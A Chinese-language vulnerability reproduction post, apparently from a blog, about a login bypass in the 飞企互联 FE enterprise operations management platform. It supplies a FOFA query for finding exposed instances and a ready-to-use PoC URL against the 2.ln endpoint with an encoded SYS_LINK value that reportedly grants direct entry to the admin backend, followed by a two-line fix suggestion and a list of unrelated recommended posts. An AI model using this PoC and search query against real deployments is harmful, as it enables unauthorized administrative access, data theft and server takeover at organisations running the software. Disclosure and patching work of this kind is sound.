飞企互联-FE企业运营管理平台 登录绕过漏洞复现

0x01 产品简介

飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。这个平台可以连接人、链接端、联通内外,支持企业B2B、C2B与O2O等核心需求,为不同行业客户的互联网+转型提供支持。

0x02 漏洞概述

飞企互联-FE企业运营管理平台 2.ln接口处存在登录绕过漏洞,未授权的攻击者可构造恶意的url访问页面,可直接进入后台管理页面,获取敏感信息,进一步利用可控制整个服务器。

0x03 复现环境

FOFA:app="飞企互联-FE企业运营管理平台"

0x04 漏洞复现

PoC

复制代码
http://your-ip/2.ln?SYS_LINK=77507068764957484a5067777862714f457a66574871642f4330574c76717868394a35496d37416c497951724f33446f51486375685a5a2b31684938472b7056

直接拼接url即可进入后台

0x05 修复建议

关闭或删除相关接口

升级至安全版本

相关推荐
KKKlucifer16 小时前
国内堡垒机如何打通云网运维安全一体化
运维·安全
FreeCultureBoy17 小时前
GDidees CMS - Arbitrary File Upload (CVE-2023-27178)
安全
程序猿编码17 小时前
给你的网络流量穿件“隐形衣“:手把手教你用对称加密打造透明安全隧道
linux·开发语言·网络·安全·linux内核
飞飞传输21 小时前
国产化FTP替代方案哪个好?选对平台让传输更安全高效
大数据·运维·安全
whyfail21 小时前
CVE-2026-39363-Vite开发服务器安全漏洞深度分析
安全·vite
Y学院21 小时前
网络安全基础核心知识点教程
网络·web安全·php
amao99881 天前
系统安全-概述
安全·系统安全
阿赛工作室1 天前
符合欧盟安全标准的 Node.js + Vue3 全栈架构设计
安全·node.js
QC·Rex1 天前
Kubernetes 生产环境调试安全最佳实践:2026 年完整指南
安全·贪心算法·kubernetes
德迅云安全-小潘1 天前
游戏行业网络安全态势分析与应对
安全·web安全·游戏